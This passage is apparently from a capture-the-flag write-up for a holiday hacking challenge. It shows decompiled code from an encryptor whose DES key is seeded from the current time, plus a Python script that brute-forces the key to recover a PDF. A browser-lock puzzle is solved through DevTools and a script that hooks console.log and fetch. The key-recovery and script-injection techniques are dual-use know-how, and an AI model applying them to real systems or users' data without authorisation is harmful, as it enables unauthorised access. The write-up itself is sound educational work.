We can see that `DES` encryption algorithm is used in default mode (`CBC`) with default initialization vector (all zeros). The key is generated in `generate_key` methods. Let's take a look:

```c
void __cdecl generate_key(int key_buf)
{
  FILE *pFVar1;
  uint r;
  __time64_t cur_time;
  char *msg;
  uint i;
  
  msg = "Our miniature elves are putting together random bits for your secret key!\n\n";
  pFVar1 = __iob_func();
  fprintf(pFVar1 + 2,msg);
  
  // Get current time in seconds since epoch
  cur_time = get_cur_time((__time64_t *)0x0);
  
  // Initialize random numbers generator with the current time
  super_secure_srand((int)cur_time);
  
  // Generate 8 random bytes and store them in key_buf
  i = 0;
  while (i < 8) {
    r = super_secure_random();
    *(undefined *)(key_buf + i) = (char)r;
    i = i + 1;
  }
  return;
}

/* Get the current time in seconds since epoch */
__time64_t __cdecl get_cur_time(__time64_t *time)
{
  __time64_t _Var1;
  
  _Var1 = _time64(time);
  return _Var1;
}

/* Initialize random numbers generator - simply store the seed in global variable */
void __cdecl super_secure_srand(undefined4 seed)
{
  FILE *pFVar1;
  char *msg;
  undefined4 _seed;
  
  msg = "Seed = %d\n\n";
  _seed = seed;
  pFVar1 = __iob_func();
  fprintf(pFVar1 + 2,msg,_seed);
  SEED = seed;
  return;
}

/* Generate one random based on seed */
uint super_secure_random(void)
{
  SEED = SEED * 0x343fd + 0x269ec3;
  return SEED >> 0x10 & 0x7fff;
}
```

The key is generated based on seed. If we know the seed, we can reconstruct the key. Fortunately, the seed is the current time in seconds since epoch and we know that the document was encrypted between 7pm and 9pm on December 6th 2019.

There's only 7200 possible keys, so we can decrypt the document using brute force method:

```python
from time import strptime
from calendar import timegm
from Crypto.Cipher import DES
import sys

START_TIME = timegm(strptime('2019-12-06T19:00', '%Y-%m-%dT%H:%M'))
END_TIME = timegm(strptime('2019-12-06T21:00', '%Y-%m-%dT%H:%M'))
KEY_LENGTH = 8

SEED = 0

def generate_random_number():
    global SEED
    
    SEED = SEED * 0x343fd + 0x269ec3
    return SEED >> 0x10 & 0x7fff

def generate_key(seed, key_length):
    global SEED

    SEED = seed
    key = bytearray()
    for i in range(8):
        key.append(generate_random_number() & 0xFF)
    return key

with open(sys.argv[1], 'rb') as f:
    encrypted = f.read()

for timestamp in range(START_TIME, END_TIME):
    key = generate_key(timestamp, KEY_LENGTH)
    cipher = DES.new(key, DES.MODE_CBC, iv=b'\x00'*8)
    decrypted = cipher.decrypt(encrypted[:8])
    try:
        if decrypted[:5].decode('ascii') == '%PDF-':
            with open(sys.argv[1][:-4], 'wb') as f:
                f.write(decrypted + cipher.decrypt(encrypted[8:]))
            sys.exit(0)
    except UnicodeDecodeError:
        continue
```

We generate the keys for all possible timestamps and check if they work. To optimize, we decrypt only one block (8 bytes) and check if it starts with `%PDF-` (we know it is a PDF document). If it does - we decrypt the remaining part.

The cover page looks like this:

![Cover page](10_Recover_Cleartext_Document/cover_page.png "Cover page")

**Answer: Machine Learning Sleigh Route Finder**

# 11) Open the Sleigh Shop Door

> Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny?
>
> For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.

We need to open the crate. To do this, we need to answer several questions:

*You don't need a clever riddle to open the console and scroll a little.*

Open the Chrome Developer Tools console and scroll up. The code is there.

*Some codes are hard to spy, perhaps they'll show up on pulp with dye?*

Open print preview. The code is there.

*This code is still unknown; it was fetched but never shown.*

Open the Chrome Developer Tools Network tab. There'll be a request to fetch a PNG file with random name in a form `<GUID>.png`. Open it and the code will be there.

*Where might we keep the things we forage? Yes, of course: Local barrels!*

The code is in application's local storage, under `🛢️🛢️🛢️` key.

*Did you notice the code in the title? It may very well prove vital.*

The code is in page's title. It's preceeded by several whitespaces, so it's not visible on browser's title bar, but can be viewed in the page's source inside the `<title>` tag.

*In order for this hologram to be effective, it may be necessary to increase your perspective.*

Inspect the hologram picture. It's a `<div>` with `hologram` class. The `hologram` class has `perspective` property set to `150px`. Increase it to `111500px` and the whole code will appear on the hologram.

*The font you're seeing is pretty slick, but this lock's code was my first pick.*

The code is the first element of the `.instructions` `font-family`. You can see it in the page's source.

*In the event that the `.eggs` go bad, you must figure out who will be sad.*

The `.eggs` text is inside the `<span>` with `eggs` class. There's an event handle registered: `()=>window['VERONICA']='sad'`.

*This next code will be unredacted, but only when all the chakras are :active.*

Force `:active` state on all elements with class `chakra` (right-click on the element -> Force state -> :active) in Elements view of Chrome Developers Tools.

*Oh, no! This lock's out of commission! Pop off the cover and locate what's missing.*

Open Elements tab of Chrome Developers Tools and move the `<div>` with class `cover` outside of `<div>` with `lock c10` class. The lock's circuit board will appear with the code printed on it.
However, clicking on Unlock button doesn't work. The following error appears on the console: `Error: Missing macaroni!`. To bypass it, add the following element: `<div class="component macaroni" data-code="A33"></div>`.
Another error pops up: `Error: Missing cotton swab!`. Add the following element: `<div class="component swab" data-code="J39"></div>`.
Yet another error pops up: `Error: Missing gnome!`. Add the following element: `<div class="component gnome" data-code="XJ0"></div>`.
The whole `<div>` element should look like this:

```html
<div class="lock c10">
    <input type="text" maxlength="8" data-id="10">
    <button data-id="10" class="switch"></button>
    <span class="led-indicator locked"></span>
    <span class="led-indicator unlocked"></span>
    <div class="component macaroni" data-code="A33"></div>
    <div class="component swab" data-code="J39"></div>
    <div class="component gnome" data-code="XJ0"></div>
</div>
```

After this, the crate will finally open revealing the paper scrap with the message: `The villian is The Tooth Fairy`.

**Answer: The Tooth Fairy**

This isn't the end :) The final message shows the time spent on opening the crate and encourages to improve it. I couldn't resist, so I automated the solution.

I automated it with Selenium. With the below python script, I open the Chrome browser with custom extension which opens the crate:

```python
import time
from selenium import webdriver

options = webdriver.ChromeOptions()
options.add_argument("load-extension=chrome-extension")
driver = webdriver.Chrome(options=options)

driver.get('https://sleighworkshopdoor.elfu.org/')
```

I unlock all the locks with JavaScript. However, to unlock 1st and 3rd locks, the script must be executed before any other script.
Code for 1st lock is printed in the console - I had too intercept all `console.log()` invocations. Code for 3rd lock in present in the image downloaded by JavaScript - I had to intercept all `fetch()` invocations to OCR the code from the image being downloaded.
Selenium can inject JavaScript into the page, but only after it's loaded, which is too late. The only way forward was to create custom Chrome extension.

The extension is very simple, it injects the `solver.js` JavaScript in a way that it's executed before any other script.

```javascript
function solve(n, code) {
    document.querySelector(`input[data-id='${n}']:not(.hint-dispenser)`).value = code;
    document.querySelector(`button[data-id='${n}']:not(.hint-dispenser)`).disabled = false;
    document.querySelector(`button[data-id='${n}']:not(.hint-dispenser)`).click();
}

var CODE_1 = '';
var CODE_3 = '';
const log = console.log;
const f = window.fetch;
(function() {
    console.log = function() {
        if (typeof arguments[0] === 'string') {
            m = arguments[0].match(/([A-Z0-9]{8})/g);
            if (m) {
                CODE_1 = m[0];
            }
        }
        log.apply(this, Array.prototype.slice.call(arguments));
    };

    window.fetch = function() {
        return new Promise((resolve, reject) => {
            f.apply(this, arguments).then((response) => {
                if (arguments[0].endsWith('.png')) {
                    console.log(response.url);
                    response.blob().then((image) => {
                        const { createWorker } = Tesseract;
                        (async () => {
                            const worker = createWorker();
                            await worker.load();
                            await worker.loadLanguage('eng');
                            await worker.initialize('eng');
                            await worker.setParameters({
                                tessedit_char_whitelist: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
                            });
                            const { data: { text } } = await worker.recognize(image);
                            CODE_3 = text.trim();
                            var event = new Event('code3ready');
                            window.dispatchEvent(event);
                        })();
                    });
                }
                resolve(response);
            });
          });
       }
}());

window.addEventListener('code3ready', solve_all, false);

function solve_all() {
    console.log('Solving all');
    solve(1, CODE_1);
    solve(2, document.querySelector("div.libra strong").innerText);
    solve(3, CODE_3);
    solve(4, localStorage.getItem('🛢️🛢️🛢️'));
    solve(5, document.title.slice(document.title.length - 8));
    solve(6, [4, 1, 5, 7, 6, 3, 8, 2].map(n => document.querySelector(`div.hologram div.items div:nth-child(${n})`).innerText).join(''));
    solve(7, getComputedStyle(document.querySelector('.instructions')).fontFamily.split(',')[0].replace(/^"+|"+$/gm,''));
    solve(8, 'VERONICA');
    solve(9, Array.prototype.slice.call(document.styleSheets[0].rules).filter(rule => rule.selectorText?rule.selectorText.startsWith('span.chakra:nth-child'):false).map(rule => rule.style.content).join('').replace(/"/gm,''));
    document.querySelector('.lock.c10').appendChild(document.querySelector('.macaroni'));
    document.querySelector('.lock.c10').appendChild(document.querySelector('.swab'));
    document.querySelector('.lock.c10').appendChild(document.querySelector('.gnome'));
    solve(10, 'KD29XJ37');
}
```

![Solution](11_Open_the_Sleigh_Shop_Door/solution.jpg "Solution")